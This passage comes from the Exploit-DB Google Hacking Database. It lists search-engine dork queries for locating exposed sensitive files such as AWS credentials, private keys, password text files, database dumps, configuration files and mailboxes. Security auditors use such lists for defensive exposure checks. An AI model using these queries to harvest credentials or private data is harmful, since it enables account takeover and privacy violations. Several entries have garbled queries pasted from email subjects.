<link>https://www.exploit-db.com/ghdb/1167</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:Bookmarks inurl:bookmarks.html &quot;Bookmarks</shortDescription>
<textualDescription>AFAIK are the bookmarks of Firefox, Netscape and Mozilla stored in bookmarks.html. It is often uploaded to serve as a backup, so it could reveal some juicy information.</textualDescription>
<query>intitle:Bookmarks inurl:bookmarks.html &quot;Bookmarks</query>
<querystring>https://www.google.com/search?q=intitle%3ABookmarks+inurl%3Abookmarks.html+%22Bookmarks+Toolbar+Folder%22+%22Add+bookmarks+to+this+folder+to+see+them+displayed+on+the+Bookmarks+Toolbar%22</querystring>
<edb></edb>
<date>2005-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>7622</id>
<link>https://www.exploit-db.com/ghdb/7622</link>
<category>Files Containing Juicy Info</category>
<shortDescription>Intitle:database ext:sql</shortDescription>
<textualDescription># Google Dork: Intitle:database ext:sql
# Files Containing Juicy Info
# Date:5/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>Intitle:database ext:sql</query>
<querystring>https://www.google.com/search?q=Intitle:database ext:sql</querystring>
<edb></edb>
<date>2021-11-05</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>6756</id>
<link>https://www.exploit-db.com/ghdb/6756</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:final.attendee.list | inurl:final.attendee.list</shortDescription>
<textualDescription># Google Dork: intitle:final.attendee.list | inurl:final.attendee.list
# Juicy info.
# Date: 18/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:final.attendee.list | inurl:final.attendee.list</query>
<querystring>https://www.google.com/search?q=intitle:final.attendee.list | inurl:final.attendee.list</querystring>
<edb></edb>
<date>2021-01-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7316</id>
<link>https://www.exploit-db.com/ghdb/7316</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:GoogleService-Info filetype:plist</shortDescription>
<textualDescription># Google Dork: intitle:GoogleService-Info filetype:plist
# File Containing Juicy Info
# Date: 15/09/2021
# Exploit Author: Madan Kumawat</textualDescription>
<query>intitle:GoogleService-Info filetype:plist</query>
<querystring>https://www.google.com/search?q=intitle:GoogleService-Info filetype:plist</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Madan Kumawat</author>
</entry>
<entry>
<id>7398</id>
<link>https://www.exploit-db.com/ghdb/7398</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index de sshd_config</shortDescription>
<textualDescription># Google Dork: intitle:index de sshd_config
# Files Containing Juicy Info
# Date: 06/10/2021
# Exploit Author: Naman Shah</textualDescription>
<query>intitle:index de sshd_config</query>
<querystring>https://www.google.com/search?q=intitle:index de sshd_config</querystring>
<edb></edb>
<date>2021-10-06</date>
<author>Naman Shah</author>
</entry>
<entry>
<id>7894</id>
<link>https://www.exploit-db.com/ghdb/7894</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of &quot;aws/credentials&quot;</shortDescription>
<textualDescription># Google Dork: intitle:index of &quot;aws/credentials&quot;
# Files Containing Juicy Info
# Date: 20/12/2021
# Exploit Author: Yuliia Danylovych
</textualDescription>
<query>intitle:index of &quot;aws/credentials&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index of &quot;aws/credentials&quot;</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Yuliia Danylovych</author>
</entry>
<entry>
<id>7943</id>
<link>https://www.exploit-db.com/ghdb/7943</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of &quot;error_log&quot;</shortDescription>
<textualDescription># Google Dork: intitle:index of &quot;error_log&quot;
# Files Containing Juicy Info
# Date: 19/06/202
# Exploit Author: Mohit veer Kondaveti</textualDescription>
<query>intitle:index of &quot;error_log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index of &quot;error_log&quot;</querystring>
<edb></edb>
<date>2022-06-20</date>
<author>Mohit veer Kondaveti</author>
</entry>
<entry>
<id>8299</id>
<link>https://www.exploit-db.com/ghdb/8299</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of &quot;main.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:index of &quot;main.js&quot;
# Files Containing Juicy Info
# Date: 01/11/2023
# Exploit: Riya Gupta</textualDescription>
<query>intitle:index of &quot;main.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index of &quot;main.js&quot;</querystring>
<edb></edb>
<date>2023-11-01</date>
<author>Riya Gupta</author>
</entry>
<entry>
<id>8067</id>
<link>https://www.exploit-db.com/ghdb/8067</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of &quot;wc.db&quot;</shortDescription>
<textualDescription># Google Dork: intitle:index of &quot;wc.db&quot;
# Files Containing Juicy Info
# Date:15/02/2023
# Exploit Author: Pradeep A</textualDescription>
<query>intitle:index of &quot;wc.db&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index of &quot;wc.db&quot;</querystring>
<edb></edb>
<date>2023-02-15</date>
<author>Pradeep A</author>
</entry>
<entry>
<id>7921</id>
<link>https://www.exploit-db.com/ghdb/7921</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of ./jira-software</shortDescription>
<textualDescription># Description : intitle:index of ./jira-software
# Files Containing Juicy Info
# Date: 28/01/2022
# Exploit Author: Sonu Chaudhary
# This google dork help to find the server that is using Jira-software</textualDescription>
<query>intitle:index of ./jira-software</query>
<querystring>https://www.google.com/search?q=intitle:index of ./jira-software</querystring>
<edb></edb>
<date>2022-06-17</date>
<author>Sonu Chaudhary</author>
</entry>
<entry>
<id>7888</id>
<link>https://www.exploit-db.com/ghdb/7888</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of /backup private</shortDescription>
<textualDescription>#Google Dork: intitle:index of /backup private
#Files containing Juicy Info
#Date: 19/12/2021
#Exploit Author: Anshika Bangar
</textualDescription>
<query>intitle:index of /backup private</query>
<querystring>https://www.google.com/search?q=intitle:index of /backup private</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Anshika Bangar</author>
</entry>
<entry>
<id>3998</id>
<link>https://www.exploit-db.com/ghdb/3998</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of /weekly cpbackup</shortDescription>
<textualDescription>useful for finding cpanel backups
--
Regards,
H.R.</textualDescription>
<query>intitle:index of /weekly cpbackup</query>
<querystring>https://www.google.com/search?q=intitle:index of /weekly cpbackup</querystring>
<edb></edb>
<date>2015-03-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>8295</id>
<link>https://www.exploit-db.com/ghdb/8295</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of /wp-admin</shortDescription>
<textualDescription># Google Dork: intitle:index of /wp-admin
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Sachin Gupta</textualDescription>
<query>Fwd: site:.co.in intitle:index of /wp-admin</query>
<querystring>https://www.google.com/search?q=Fwd: site:.co.in intitle:index of /wp-admin</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Sachin Gupta</author>
</entry>
<entry>
<id>6177</id>
<link>https://www.exploit-db.com/ghdb/6177</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of config.asp</shortDescription>
<textualDescription>Dork: intitle:index of config.asp
Description: This search brings up sites with &quot;config.asp&quot; files. this
configuration file contains both a username and a password for an SQL
database.
Author: Abhinav Porwal
</textualDescription>
<query>intitle:index of config.asp</query>
<querystring>https://www.google.com/search?q=intitle:index of config.asp</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>7500</id>
<link>https://www.exploit-db.com/ghdb/7500</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of cv site:.com</shortDescription>
<textualDescription># Google Dork: intitle:index of cv site:.com
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: MD. Rimel</textualDescription>
<query>intitle:index of cv site:.com</query>
<querystring>https://www.google.com/search?q=intitle:index of cv site:.com</querystring>
<edb></edb>
<date>2021-10-27</date>
<author>MD. Rimel</author>
</entry>
<entry>
<id>8167</id>
<link>https://www.exploit-db.com/ghdb/8167</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of db.sqlite3</shortDescription>
<textualDescription># Google Dork: intitle:index of db.sqlite3
# Files Containing Juicy Info
# Date:20/04/2023
# Exploit Author: Shebu</textualDescription>
<query>Re: Thank you for your submission! Re: intitle:index of db.sqlite3</query>
<querystring>https://www.google.com/search?q=Re: Thank you for your submission! Re: intitle:index of db.sqlite3</querystring>
<edb></edb>
<date>2023-04-20</date>
<author>Shebu</author>
</entry>
<entry>
<id>7368</id>
<link>https://www.exploit-db.com/ghdb/7368</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of django.config</shortDescription>
<textualDescription># Google Dork: intitle:index of django.config
# Files Containing Juicy Info
# Date:02/10/2021
# Exploit Author: Asif Mohammad Khan</textualDescription>
<query>intitle:index of django.config</query>
<querystring>https://www.google.com/search?q=intitle:index of django.config</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Asif Mohammad Khan</author>
</entry>
<entry>
<id>8130</id>
<link>https://www.exploit-db.com/ghdb/8130</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of django/admin site:.*</shortDescription>
<textualDescription># Google Dork: intitle:index of django/admin site:.*
# Files Containing Juicy Info
# Date:29/03/2023
# Exploit Author: Md rofikul</textualDescription>
<query>intitle:index of django/admin site:.*</query>
<querystring>https://www.google.com/search?q=intitle:index of django/admin site:.*</querystring>
<edb></edb>
<date>2023-03-29</date>
<author>Md rofikul</author>
</entry>
<entry>
<id>7827</id>
<link>https://www.exploit-db.com/ghdb/7827</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index of settings.py</shortDescription>
<textualDescription># Google Dork: intitle:index of settings.py
# Pages Containing Login Portals
# Date: 18/11/2021
# Exploit Author: Amit Adhikari</textualDescription>
<query>intitle:index of settings.py</query>
<querystring>https://www.google.com/search?q=intitle:index of settings.py</querystring>
<edb></edb>
<date>2021-11-18</date>
<author>Amit Adhikari</author>
</entry>
<entry>
<id>5645</id>
<link>https://www.exploit-db.com/ghdb/5645</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;access.conf&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;access.conf&quot;
Author:Ismail Tasdelen
Info:
It contains access.conf clear text sensitive information.
</textualDescription>
<query>intitle:index.of &quot;access.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;access.conf&quot;</querystring>
<edb></edb>
<date>2019-11-12</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>104</id>
<link>https://www.exploit-db.com/ghdb/104</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;Apache&quot; &quot;server at&quot;</shortDescription>
<textualDescription>This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers.</textualDescription>
<query>intitle:index.of &quot;Apache&quot; &quot;server at&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex%2Eof+%22Apache%22+%22server+at%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>5740</id>
<link>https://www.exploit-db.com/ghdb/5740</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;awsconfig.json&quot;</shortDescription>
<textualDescription>Find some AWS authentication configurations.
--
*Hilary Soita.*
</textualDescription>
<query>intitle:index.of &quot;awsconfig.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;awsconfig.json&quot;</querystring>
<edb></edb>
<date>2020-02-19</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>5753</id>
<link>https://www.exploit-db.com/ghdb/5753</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;cacert.pem&quot;</shortDescription>
<textualDescription>Files Contain sensitive information.
Malkit Singh
</textualDescription>
<query>intitle:index.of &quot;cacert.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;cacert.pem&quot;</querystring>
<edb></edb>
<date>2020-02-25</date>
<author>Malkit Singh</author>
</entry>
<entry>
<id>5615</id>
<link>https://www.exploit-db.com/ghdb/5615</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;credential.txt&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;credential.txt&quot;
Author:Ismail Tasdelen
Info:
It contains key credential text sensitive information.
</textualDescription>
<query>intitle:index.of &quot;credential.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;credential.txt&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>5616</id>
<link>https://www.exploit-db.com/ghdb/5616</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;key.txt&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;key.txt&quot;
Author:Ismail Tasdelen
Info:
It contains key clear text sensitive information.
</textualDescription>
<query>intitle:index.of &quot;key.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;key.txt&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>5733</id>
<link>https://www.exploit-db.com/ghdb/5733</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;keys.txt&quot;</shortDescription>
<textualDescription>AUTHOR: CANCOM #RedTeam
++ Find juicy files (API Keys, SSH Keys, Fileserver etc.) ++
intitle:index.of &quot;keys.txt&quot;
ca. 400 Results
</textualDescription>
<query>intitle:index.of &quot;keys.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;keys.txt&quot;</querystring>
<edb></edb>
<date>2020-02-14</date>
<author>CANCOM #RedTeam</author>
</entry>
<entry>
<id>5624</id>
<link>https://www.exploit-db.com/ghdb/5624</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;private-key.pem&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;private-key.pem&quot;
Author: Pankaj Kumar Thakur (Nepal)
Info:
It contains Private RSA Keys.</textualDescription>
<query>intitle:index.of &quot;private-key.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;private-key.pem&quot;</querystring>
<edb></edb>
<date>2019-11-05</date>
<author>Pankaj Kumar Thakur</author>
</entry>
<entry>
<id>5614</id>
<link>https://www.exploit-db.com/ghdb/5614</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of &quot;userpass.txt&quot;</shortDescription>
<textualDescription>Dork:
intitle:index.of &quot;userpass.txt&quot;
Author:Ismail Tasdelen
Info:
It contains key username and password text sensitive information.
</textualDescription>
<query>intitle:index.of &quot;userpass.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:index.of &quot;userpass.txt&quot;</querystring>
<edb></edb>
<date>2019-11-04</date>
<author>Ismail Tasdelen</author>
</entry>
<entry>
<id>7522</id>
<link>https://www.exploit-db.com/ghdb/7522</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of /cftp /robots.txt</shortDescription>
<textualDescription># Google Dork: # Google Dork: intitle:index.of /cftp /robots.txt
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:index.of /cftp /robots.txt</query>
<querystring>https://www.google.com/search?q=intitle:index.of /cftp /robots.txt</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>7514</id>
<link>https://www.exploit-db.com/ghdb/7514</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of /CMS /robots.txt</shortDescription>
<textualDescription># Google Dork: intitle:index.of /CMS /robots.txt
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:index.of /CMS /robots.txt</query>
<querystring>https://www.google.com/search?q=intitle:index.of /CMS /robots.txt</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>7521</id>
<link>https://www.exploit-db.com/ghdb/7521</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of /email /robots.txt</shortDescription>
<textualDescription># Google Dork: intitle:index.of /email /robots.txt
# Files Containing Juicy Info
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>intitle:index.of /email /robots.txt</query>
<querystring>https://www.google.com/search?q=intitle:index.of /email /robots.txt</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>8361</id>
<link>https://www.exploit-db.com/ghdb/8361</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of /logs.txt</shortDescription>
<textualDescription># Google Dork: intitle:index.of /logs.txt
# Files Containing Juicy Info
# Date: 27/11/2023
# Exploit: saurabh kode</textualDescription>
<query>intitle:index.of /logs.txt</query>
<querystring>https://www.google.com/search?q=intitle:index.of /logs.txt</querystring>
<edb></edb>
<date>2023-11-27</date>
<author>saurabh kode</author>
</entry>
<entry>
<id>7498</id>
<link>https://www.exploit-db.com/ghdb/7498</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of /Snowflake /robots.txt</shortDescription>
<textualDescription># Google Dork: intitle:index.of /Snowflake /robots.txt
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Nayan Chandra</textualDescription>
<query>intitle:index.of /Snowflake /robots.txt</query>
<querystring>https://www.google.com/search?q=intitle:index.of /Snowflake /robots.txt</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Nayan Chandra</author>
</entry>
<entry>
<id>150</id>
<link>https://www.exploit-db.com/ghdb/150</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of cleanup.log</shortDescription>
<textualDescription>This search reveals potential location for mailbox files by keying on the Outlook Express cleanup.log file. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.</textualDescription>
<query>intitle:index.of inbox dbx</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+inbox+dbx</querystring>
<edb></edb>
<date>2004-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>7483</id>
<link>https://www.exploit-db.com/ghdb/7483</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of conf.mysql</shortDescription>
<textualDescription># Google Dork: intitle:index.of conf.mysql
# Files Containing Juicy Info
# Date:23/10/2021
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>intitle:index.of conf.mysql</query>
<querystring>https://www.google.com/search?q=intitle:index.of conf.mysql</querystring>
<edb></edb>
<date>2021-10-25</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>8171</id>
<link>https://www.exploit-db.com/ghdb/8171</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of conf.mysql</shortDescription>
<textualDescription># Google Dork: intitle:index.of conf.mysql
# Files Containing Juicy Info
# Date:02/05/2023
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>Re: GHDB Dork</query>
<querystring>https://www.google.com/search?q=Re: GHDB Dork</querystring>
<edb></edb>
<date>2023-05-02</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>111</id>
<link>https://www.exploit-db.com/ghdb/111</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of dead.letter</shortDescription>
<textualDescription>dead.letter contains the contents of unfinished emails created on the UNIX platform. Emails (finished or not) can contain sensitive information.</textualDescription>
<query>intitle:index.of dead.letter</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+dead.letter</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>148</id>
<link>https://www.exploit-db.com/ghdb/148</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of inbox</shortDescription>
<textualDescription>This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.</textualDescription>
<query>intitle:index.of inbox</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+inbox</querystring>
<edb></edb>
<date>2004-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>149</id>
<link>https://www.exploit-db.com/ghdb/149</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of inbox dbx</shortDescription>
<textualDescription>This search reveals potential location for mailbox files. In some cases, the data in this directory or file may be of a very personal nature and may include sent and received emails and archives of email data.</textualDescription>
<query>intitle:index.of inbox dbx</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+inbox+dbx</querystring>
<edb></edb>
<date>2004-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3893</id>
<link>https://www.exploit-db.com/ghdb/3893</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of intext:.ssh</shortDescription>
<textualDescription>Find peoples ssh public and private keys
- tmc / #havok</textualDescription>
<query>intitle:index.of intext:.ssh</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:.ssh</querystring>
<edb></edb>
<date>2013-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>8073</id>
<link>https://www.exploit-db.com/ghdb/8073</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of intext:log inurl:nasa</shortDescription>
<textualDescription># Google Dork: intitle:index.of intext:log inurl:nasa
# Files Containing Juicy Info
# Date:21/02/2023
# Exploit Author: Rhishinathvarma Marimuthu</textualDescription>
<query>intitle:index.of intext:log inurl:nasa</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:log inurl:nasa</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Rhishinathvarma Marimuthu</author>
</entry>
<entry>
<id>8263</id>
<link>https://www.exploit-db.com/ghdb/8263</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of intext:log site:.bd</shortDescription>
<textualDescription># Google Dork: intitle:index.of intext:log site:.bd
# Files Containing Juicy Info
# Date:18/10/2023
# Exploit Author: Khandaker Mahidul Islam
</textualDescription>
<query>intitle:index.of intext:log site:.bd</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:log site:.bd</querystring>
<edb></edb>
<date>2023-10-18</date>
<author>Khandaker Mahidul Islam</author>
</entry>
<entry>
<id>4665</id>
<link>https://www.exploit-db.com/ghdb/4665</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of intext:zc_install intitle:zen-cart</shortDescription>
<textualDescription>Dork: *intitle:index.of intext:zc_install intitle:zen-c*art
Summary:
A Google dork that gives the information about target database and source
code. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy)
</textualDescription>
<query>intitle:index.of intext:zc_install intitle:zen-cart</query>
<querystring>https://www.google.com/search?q=intitle:index.of intext:zc_install intitle:zen-cart</querystring>
<edb></edb>
<date>2018-02-05</date>
<author>Sachin Wagh</author>
</entry>
<entry>
<id>8280</id>
<link>https://www.exploit-db.com/ghdb/8280</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of login.js</shortDescription>
<textualDescription># Google Dork: intitle:index.of login.js
# Files Containing Juicy Info
# Date: 30/10/2023
# Exploit Varad Vaidya</textualDescription>
<query>intitle:index.of login.js</query>
<querystring>https://www.google.com/search?q=intitle:index.of login.js</querystring>
<edb></edb>
<date>2023-10-30</date>
<author>Varad Vaidya</author>
</entry>
<entry>
<id>7332</id>
<link>https://www.exploit-db.com/ghdb/7332</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of root user</shortDescription>
<textualDescription># Google Dork: intitle:index.of root user
# Files Containing Juicy Info
# Date:21/09/2021
# Exploit Author: Bon Sai
</textualDescription>
<query>intitle:index.of root user</query>
<querystring>https://www.google.com/search?q=intitle:index.of root user</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Bon Sai</author>
</entry>
<entry>
<id>7494</id>
<link>https://www.exploit-db.com/ghdb/7494</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of wp.login</shortDescription>
<textualDescription># Google Dork: intitle:index.of wp.login
# Files Containing Juicy Info
# Date:26/10/2021
# Exploit Author: Ramjan Ali Sabber</textualDescription>
<query>intitle:index.of wp.login</query>
<querystring>https://www.google.com/search?q=intitle:index.of wp.login</querystring>
<edb></edb>
<date>2021-10-26</date>
<author>Ramjan Ali Sabber</author>
</entry>
<entry>
<id>112</id>
<link>https://www.exploit-db.com/ghdb/112</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of ws_ftp.ini</shortDescription>
<textualDescription>ws_ftp.ini is a configuration file for a popular FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference. These should not be on the web!</textualDescription>
<query>intitle:index.of ws_ftp.ini</query>
<querystring>https://www.google.com/search?q=intitle%3Aindex.of+ws_ftp.ini</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>8293</id>
<link>https://www.exploit-db.com/ghdb/8293</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of./.database</shortDescription>
<textualDescription># Google Dork: intitle:index.of./.database
# Files Containing Juicy Info
# Date: 31/10/2023
# Exploit Rahul Thakur</textualDescription>
<query>Reporting a New Google Dork: intitle:index.of./.database</query>
<querystring>https://www.google.com/search?q=Reporting a New Google Dork: intitle:index.of./.database</querystring>
<edb></edb>
<date>2023-10-31</date>
<author>Rahul Thakur</author>
</entry>
<entry>
<id>5431</id>
<link>https://www.exploit-db.com/ghdb/5431</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of.?.config.ini</shortDescription>
<textualDescription>Google Dork: intitle:index.of.?.config.ini
Category: Sensitive Directories
Description:
Used to find sensitive configuration file (config.ini) from the website
directory, that contains database name, username &amp; password
Author: Midhun Biju
</textualDescription>
<query>intitle:index.of.?.config.ini</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.config.ini</querystring>
<edb></edb>
<date>2019-08-22</date>
<author>Midhun Biju</author>
</entry>
<entry>
<id>6263</id>
<link>https://www.exploit-db.com/ghdb/6263</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of.?.db</shortDescription>
<textualDescription>Dor: intitle:index.of.?.db
Description: Used to find database of different websites
--
With Regards,
Akhil G Krishnan
</textualDescription>
<query>intitle:index.of.?.db</query>
<querystring>https://www.google.com/search?q=intitle:index.of.?.db</querystring>
<edb></edb>
<date>2020-06-10</date>
<author>Akhil G Krishnan</author>
</entry>
<entry>
<id>3749</id>
<link>https://www.exploit-db.com/ghdb/3749</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:index.of? configuration.php.zip</shortDescription>
<textualDescription>this dork finds mostly backed up configuration.php files.
Its possible to change the *.zip to *.txt or other file types.
Author: Lord.TMR</textualDescription>
<query>intitle:index.of? configuration.php.zip</query>
<querystring>https://www.google.com/search?q=intitle:index.of? configuration.php.zip</querystring>
<edb></edb>
<date>2011-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>239</id>
<link>https://www.exploit-db.com/ghdb/239</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:intranet inurl:intranet +intext:&quot;phone&quot;</shortDescription>
<textualDescription>These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online &quot;dumpster dive&quot;.</textualDescription>
<query>intitle:intranet inurl:intranet +intext:&quot;phone&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22phone%22</querystring>
<edb></edb>
<date>2004-05-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>8322</id>
<link>https://www.exploit-db.com/ghdb/8322</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:KCFinder: /files inurl:/kcfinder/browse.php</shortDescription>
<textualDescription># Google Dork: intitle:KCFinder: /files inurl:/kcfinder/browse.php
# Files Containing Juicy Info
# Date: 06/11/2023
# Exploit: Hur Vzee</textualDescription>
<query>KCFinder Google Dork</query>
<querystring>https://www.google.com/search?q=KCFinder Google Dork</querystring>
<edb></edb>
<date>2023-11-06</date>
<author>Hur Vzee</author>
</entry>
<entry>
<id>4135</id>
<link>https://www.exploit-db.com/ghdb/4135</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:Tomcat Status | inurl:/status?full=true</shortDescription>
<textualDescription>JBOSS / Tomcat Status IP info
-Xploit </textualDescription>
<query>intitle:Tomcat Status | inurl:/status?full=true</query>
<querystring>https://www.google.com/search?q=intitle:Tomcat Status | inurl:/status?full=true</querystring>
<edb></edb>
<date>2015-11-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>7142</id>
<link>https://www.exploit-db.com/ghdb/7142</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:untitled filetype:xls intext:password</shortDescription>
<textualDescription># Google Dork: intitle:untitled filetype:xls intext:password
# Files Containing Juicy Info
# Date: 24/08/2021
# Exploit Author: Vaibhav Kumar Srivastava</textualDescription>
<query>intitle:untitled filetype:xls intext:password</query>
<querystring>https://www.google.com/search?q=intitle:untitled filetype:xls intext:password</querystring>
<edb></edb>
<date>2021-09-01</date>
<author>Vaibhav Kumar Srivastava</author>
</entry>
<entry>
<id>7846</id>
<link>https://www.exploit-db.com/ghdb/7846</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:\&quot;Index of cd&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;man.sh&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;Index of cd&quot;</query>
